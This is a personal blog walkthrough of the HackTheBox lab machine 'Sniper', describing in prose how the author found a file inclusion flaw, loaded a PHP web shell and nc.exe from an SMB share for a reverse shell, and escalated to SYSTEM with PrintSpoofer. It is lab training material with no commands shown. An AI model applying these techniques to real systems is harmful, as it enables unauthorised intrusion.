Over the weekend I worked on the box: Sniper.
Let’s dive in right away on how I did it!
NOTE: This is not meant to be a tutorial but rather a walkthrough on how I did it.
Let’s start pwning the awesome box
The IP address of the box is: 10.10.10.151
Like every other pentesting and pwning methodology, let’s start with a simple nmap scan of the box (10.10.10.151):
As we can see, we have the SMB ports, NFS port and HTTP ports open.
The HTTP port looks like the most prominent one, so let's dive into that!
After looking through the (not so interesting) main page, I decide to run gobuster through it to get all the interesting directories.
Gobuster gives us a list of these interesting dirs, as /user and /blog are the ones present in the home page too, so I decided to check them out.
I wander through the /user part of the site for a long time, as it presents what seems like a hackable login page. However, I couldn’t login or find any kind of vulnerability in it.
So, I give up on this part of the directory and move on to look at /blog.
As soon as I visit /blog, I find an interesting finding. It seems like a LFI! However, when I try to include pages/files from other directories; it fails.
So, after a while however I remember that there are ports 139 & 445 open! That means I can possibly include files from other open smb shares. I do just that. I place a simple <shell.php> in my smb share and try to require that file from the link and it works! So, I place netcat (nc.exe) in my smb share and try to run that through the shell.php.
The simple shell.php just executes commands from the cmd get request parameter.
This gives me the initial shell! Hurray!!!
As, we can see I got the reverse shell. And also from the name of my user ‘iusr’, I happen to be a service user. So, I check my privileges and I do have all the service privileges.
I think of using one of the potato exploits but as the Operating System I’m running is Windows Server 2019, they might not be effective for this machine. Hence, I resort to the other new priv esc exploit, PrintSpoofer.
I move the PrintSpoofer into my smb share and try to get another reverse shell by executing nc.exe. Also note that I couldn’t create any files anywhere in the system as it kept giving me access denied; therefore I only used my open smb share and did not place any files anywhere in the system (good hiding & no footprints!)
So I got system access in my listening nc.
Boom! One system down!
When I looked online after I pwned the box, it seems like there were also other multiple ways of pwning the box except for straight up abusing the service privileges. However, I (by luck) did the simplest one! Looking forward to pwning other boxes.
No comments:
Post a Comment